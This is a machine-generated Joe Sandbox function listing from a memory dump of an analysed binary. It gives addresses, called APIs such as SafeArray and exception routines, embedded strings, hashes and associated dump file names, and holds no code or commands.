Opcode Fuzzy Hash: f26f92a5535806629c817d6aab0c096795f9fff3c2ede942751d68cd0e55e7b4
Instruction Fuzzy Hash: 9CC146716087109FC700DFA8C880D5AB7F6BFC9708F248A4DE5989B761D731E885CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CE39D00 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 326COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CE39DEB
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CE39DFB
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CE39E29
SafeArrayDestroy.OLEAUT32(?), ref: 6CE39F25
VariantClear.OLEAUT32(?), ref: 6CE39FE5

Strings

@, xrefs: 6CE39DD7

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArraySafe$Bound$ClearDestroyElementVariant
String ID: @
API String ID: 3214203402-2766056989
Opcode ID: 4e59ad4119d76df2765358696063aa553fb48e1fee04c4201d42a3b64797b5c0
Instruction ID: a9330554f9cf0277ac4df50732222df3b95aed6a2e04941b8a63966871a6e146
Opcode Fuzzy Hash: 4e59ad4119d76df2765358696063aa553fb48e1fee04c4201d42a3b64797b5c0
Instruction Fuzzy Hash: D1D16A71D002598FDB00DFE9C880AADBBB5BF88308F64815DE519AB754DB35AA45CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6CE3B300 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 326COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CE3B3EB
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CE3B3FB
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CE3B429
SafeArrayDestroy.OLEAUT32(?), ref: 6CE3B525
VariantClear.OLEAUT32(?), ref: 6CE3B5E5

Strings

@, xrefs: 6CE3B3D7

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ArraySafe$Bound$ClearDestroyElementVariant
String ID: @
API String ID: 3214203402-2766056989
Opcode ID: 3b627ecb79f586005787d629bdfe74a55786ff1564154dc28415c63e359cc8c5
Instruction ID: aa155449e8900dc256b0147077dcd3381420e8a4544f97028b6115d99a6612df
Opcode Fuzzy Hash: 3b627ecb79f586005787d629bdfe74a55786ff1564154dc28415c63e359cc8c5
Instruction Fuzzy Hash: 51D16C71E01659DFDF00DFA8C880AADBBB6BF48308F24815DD51AAB754D730AA45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6CE87FE0 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 325COMMON

Download Yara Rule

APIs

Part of subcall function 6CE24010: std::_Xinvalid_argument.LIBCPMT ref: 6CE2402A

__CxxThrowException@8.LIBCMT ref: 6CE880EA

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

Strings

RandomNumberType, xrefs: 6CE883A9
Min, xrefs: 6CE883C5
invalid bit length, xrefs: 6CE88044
Max, xrefs: 6CE883E3
T|l, xrefs: 6CE882AA, 6CE882AE

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
String ID: Max$Min$RandomNumberType$T|l$invalid bit length
API String ID: 3718517217-4078127270
Opcode ID: 0cfddf4d707c0562bdb75f12c2c8fbbc5336b46ece28aed0849a5092e41c16d7
Instruction ID: 94696084927567d482c559e37f1a0af8f45c634ddd59ec1eabb0983dcfba5acf
Opcode Fuzzy Hash: 0cfddf4d707c0562bdb75f12c2c8fbbc5336b46ece28aed0849a5092e41c16d7
Instruction Fuzzy Hash: 21C1BD711097809AE334CB68C850BCFB7F5AFDA304F644A1DE589837A1DB359909C7A3

Uniqueness

Uniqueness Score: -1.00%

Function 6CE61580 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 277COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6CE616B2

Part of subcall function 6CE8AC75: RaiseException.KERNEL32(?,?,6CE89C34,CB65479A,?,?,?,?,6CE89C34,CB65479A,6CEB9C90,6CECB974,CB65479A), ref: 6CE8ACB7

__CxxThrowException@8.LIBCMT ref: 6CE6180A

Part of subcall function 6CE24010: std::_Xinvalid_argument.LIBCPMT ref: 6CE2402A

Strings

exceeds the maximum of , xrefs: 6CE6173F
for this public key, xrefs: 6CE61771
: this key is too short to encrypt any messages, xrefs: 6CE6162A
: message length of , xrefs: 6CE6170D

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaiseXinvalid_argumentstd::_
String ID: exceeds the maximum of $ for this public key$: message length of $: this key is too short to encrypt any messages
API String ID: 3807434085-412673420
Opcode ID: c0b33c9e73f7469382d9f110095769abf09472367092ffc314a0e135820a824e
Instruction ID: 4cfbab1b0e8549965074d688fc6572b867e97b92c020c888923ecac32f09a17d
Opcode Fuzzy Hash: c0b33c9e73f7469382d9f110095769abf09472367092ffc314a0e135820a824e
Instruction Fuzzy Hash: 24B138716083809FD320DB69C890BDBB7E9AFD9304F24891DE59D87751DB34A909CBA3

Uniqueness

Uniqueness Score: -1.00%

Function 6CE3D4B0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE3D5E4
__CxxThrowException@8.LIBCMT ref: 6CE3D5F9
std::exception::exception.LIBCMT ref: 6CE3D608
__CxxThrowException@8.LIBCMT ref: 6CE3D61D

Part of subcall function 6CE89BB5: std::exception::exception.LIBCMT ref: 6CE89C04
Part of subcall function 6CE89BB5: std::exception::exception.LIBCMT ref: 6CE89C1E
Part of subcall function 6CE89BB5: __CxxThrowException@8.LIBCMT ref: 6CE89C2F

Strings

0Bl, xrefs: 6CE3D5F2
0Bl, xrefs: 6CE3D616

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$_malloc
String ID: 0Bl$0Bl
API String ID: 2621100827-1774228455
Opcode ID: 77acc9e34e29d00050007e87bd02ff94cfb056aaeee2b35a97c42215e6428853
Instruction ID: 288ba933a95c1ac5a4ea7f421b15260d1e0184058679c93678a2cc708e801f91
Opcode Fuzzy Hash: 77acc9e34e29d00050007e87bd02ff94cfb056aaeee2b35a97c42215e6428853
Instruction Fuzzy Hash: 0C513AB5A01649EFC704CFA8C980A99BBF4FB09304F60866EE41997B40D771FA54CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE45F00 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE46035
__CxxThrowException@8.LIBCMT ref: 6CE4604A
std::exception::exception.LIBCMT ref: 6CE46059
__CxxThrowException@8.LIBCMT ref: 6CE4606E

Part of subcall function 6CE89BB5: std::exception::exception.LIBCMT ref: 6CE89C04
Part of subcall function 6CE89BB5: std::exception::exception.LIBCMT ref: 6CE89C1E
Part of subcall function 6CE89BB5: __CxxThrowException@8.LIBCMT ref: 6CE89C2F

Strings

0Bl, xrefs: 6CE46043
0Bl, xrefs: 6CE46067

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$_malloc
String ID: 0Bl$0Bl
API String ID: 2621100827-1774228455
Opcode ID: 6189d0e2477ca3fa3e147cc4af85f407bd5cb71b272761d47e472a8f31868a9f
Instruction ID: daad8f77c546d0bcbf440bb557964b171d34384a179cf98107b42d173f036435
Opcode Fuzzy Hash: 6189d0e2477ca3fa3e147cc4af85f407bd5cb71b272761d47e472a8f31868a9f
Instruction Fuzzy Hash: 88515AB1A01649AFC704CFA8C980A99FBF4FF09304F20866EE419D7B40D771EA14CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE81250 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CE8126E

Part of subcall function 6CE890D8: std::exception::exception.LIBCMT ref: 6CE890ED
Part of subcall function 6CE890D8: __CxxThrowException@8.LIBCMT ref: 6CE89102
Part of subcall function 6CE890D8: std::exception::exception.LIBCMT ref: 6CE89113

_memmove.LIBCMT ref: 6CE812E0
_memmove.LIBCMT ref: 6CE81305
_memmove.LIBCMT ref: 6CE81342
_memmove.LIBCMT ref: 6CE8135F

Strings

deque<T> too long, xrefs: 6CE81269

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: deque<T> too long
API String ID: 4034224661-309773918
Opcode ID: c7f10db870c7e3378e64b819d028a5ed48822272bd2a6c3405f1e3d378a7caa0
Instruction ID: 789045a27768b70b8ac509f93cb1dd7d00d0d10158f7f76c9bbb5a58f663d135
Opcode Fuzzy Hash: c7f10db870c7e3378e64b819d028a5ed48822272bd2a6c3405f1e3d378a7caa0
Instruction Fuzzy Hash: 3041D772A052045FD704CE68DC81A6BB7F6EBC4214F298A2DE81DD7B44EA34ED0587A2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE813A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CE813BE

Part of subcall function 6CE890D8: std::exception::exception.LIBCMT ref: 6CE890ED
Part of subcall function 6CE890D8: __CxxThrowException@8.LIBCMT ref: 6CE89102
Part of subcall function 6CE890D8: std::exception::exception.LIBCMT ref: 6CE89113

_memmove.LIBCMT ref: 6CE81431
_memmove.LIBCMT ref: 6CE81456
_memmove.LIBCMT ref: 6CE81493
_memmove.LIBCMT ref: 6CE814B0

Strings

deque<T> too long, xrefs: 6CE813B9

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: _memmove$std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: deque<T> too long
API String ID: 4034224661-309773918
Opcode ID: b78ab62fbc533872bb7bcbf1fe28f75b51229adc975963a024b1a921795660b4
Instruction ID: 817b4e8edcce4bcbdd3aa2b980f810ba220b361b4c4384a34bff2ebdf0df5023
Opcode Fuzzy Hash: b78ab62fbc533872bb7bcbf1fe28f75b51229adc975963a024b1a921795660b4
Instruction Fuzzy Hash: 9241E672A052045BC704CE68DC8196BB7F6EBC4314F29862CE85ED7B45EA34ED09C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 6CE45DB0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE45E87
__CxxThrowException@8.LIBCMT ref: 6CE45E9C
std::exception::exception.LIBCMT ref: 6CE45EAB
__CxxThrowException@8.LIBCMT ref: 6CE45EC0

Part of subcall function 6CE89BB5: std::exception::exception.LIBCMT ref: 6CE89C04
Part of subcall function 6CE89BB5: std::exception::exception.LIBCMT ref: 6CE89C1E
Part of subcall function 6CE89BB5: __CxxThrowException@8.LIBCMT ref: 6CE89C2F

Strings

0Bl, xrefs: 6CE45EB9
0Bl, xrefs: 6CE45E95

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$_malloc
String ID: 0Bl$0Bl
API String ID: 2621100827-1774228455
Opcode ID: 5530679eea6886609345d58a0850c9b87c68e5a2a839a33a3defbfa907fb8b0b
Instruction ID: 8d1bc7ff9ab934ca8d1dd18de503351e34a259d57ba9f0f2e427aff8cfde6d77
Opcode Fuzzy Hash: 5530679eea6886609345d58a0850c9b87c68e5a2a839a33a3defbfa907fb8b0b
Instruction Fuzzy Hash: FC4149B19017489FC720CFA8D980A9ABBF4FB09304F60896ED45A97B41D771E608CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE3D360 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE3D437
__CxxThrowException@8.LIBCMT ref: 6CE3D44C
std::exception::exception.LIBCMT ref: 6CE3D45B
__CxxThrowException@8.LIBCMT ref: 6CE3D470

Part of subcall function 6CE89BB5: std::exception::exception.LIBCMT ref: 6CE89C04
Part of subcall function 6CE89BB5: std::exception::exception.LIBCMT ref: 6CE89C1E
Part of subcall function 6CE89BB5: __CxxThrowException@8.LIBCMT ref: 6CE89C2F

Strings

0Bl, xrefs: 6CE3D445
0Bl, xrefs: 6CE3D469

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$_malloc
String ID: 0Bl$0Bl
API String ID: 2621100827-1774228455
Opcode ID: a59f032cae0ff2d0b9bcf36db9aec99315f16fc7ca2299c9b2ab9e3577fbd0d5
Instruction ID: 9bfc74098564ce858bf56ac1a60fabdf92ffb8a7195c11e7eaf258ed6714ce18
Opcode Fuzzy Hash: a59f032cae0ff2d0b9bcf36db9aec99315f16fc7ca2299c9b2ab9e3577fbd0d5
Instruction Fuzzy Hash: ED412BB19017489FC720CFA9D980A9ABBF4FB09304F60496ED45A97B51D771F608CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6CE82B80 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

Part of subcall function 6CE56480: __CxxThrowException@8.LIBCMT ref: 6CE56518
Part of subcall function 6CE56480: __CxxThrowException@8.LIBCMT ref: 6CE56558

Part of subcall function 6CE89BB5: _malloc.LIBCMT ref: 6CE89BCF

std::exception::exception.LIBCMT ref: 6CE82C9A
__CxxThrowException@8.LIBCMT ref: 6CE82CB1
std::exception::exception.LIBCMT ref: 6CE82CC3
__CxxThrowException@8.LIBCMT ref: 6CE82CDA

Part of subcall function 6CE89BB5: std::exception::exception.LIBCMT ref: 6CE89C04
Part of subcall function 6CE89BB5: std::exception::exception.LIBCMT ref: 6CE89C1E
Part of subcall function 6CE89BB5: __CxxThrowException@8.LIBCMT ref: 6CE89C2F

Strings

0Bl, xrefs: 6CE82CD2
0Bl, xrefs: 6CE82CA9

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Exception@8Throw$std::exception::exception$_malloc
String ID: 0Bl$0Bl
API String ID: 3942750879-1774228455
Opcode ID: c79dec2f91afca3105df30d6c77fdfb5d424d3619f360680aa3f7ae23c7f75fd
Instruction ID: 2206fa522527a8f93669107707d340422581719086bc81554c7ef422bf78808f
Opcode Fuzzy Hash: c79dec2f91afca3105df30d6c77fdfb5d424d3619f360680aa3f7ae23c7f75fd
Instruction Fuzzy Hash: 96415DB15157419FC314CF58C481A5AFBF4FF99704F60892EF19A87B90D771A508CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6CE24D90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CE24DA9

Part of subcall function 6CE89125: std::exception::exception.LIBCMT ref: 6CE8913A
Part of subcall function 6CE89125: __CxxThrowException@8.LIBCMT ref: 6CE8914F
Part of subcall function 6CE89125: std::exception::exception.LIBCMT ref: 6CE89160

std::_Xinvalid_argument.LIBCPMT ref: 6CE24DCA
std::_Xinvalid_argument.LIBCPMT ref: 6CE24DE5
_memmove.LIBCMT ref: 6CE24E4D

Strings

invalid string position, xrefs: 6CE24DA4
string too long, xrefs: 6CE24DC5, 6CE24DE0

Memory Dump Source

Source File: 00000004.00000002.1921729783.000000006CE21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CE20000, based on PE: true

Associated: 00000004.00000002.1921711442.000000006CE20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922042390.000000006CEA4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922128930.000000006CEBE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922155987.000000006CEC0000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922177057.000000006CEC1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922200396.000000006CEC3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECA000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922235585.000000006CECC000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.1922277834.000000006CECE000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ce20000_4854.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 443534600-4289949731
Opcode ID: add0cc6dc207989f1aa5bdad3aa73afd8c6a82cfe98dc29ab6b462ddb6a70c2f
Instruction ID: a4f022bef2bcd1ba2f208271a8704f0a9d9bf1726084ea1de08562015d53a006
Opcode Fuzzy Hash: add0cc6dc207989f1aa5bdad3aa73afd8c6a82cfe98dc29ab6b462ddb6a70c2f
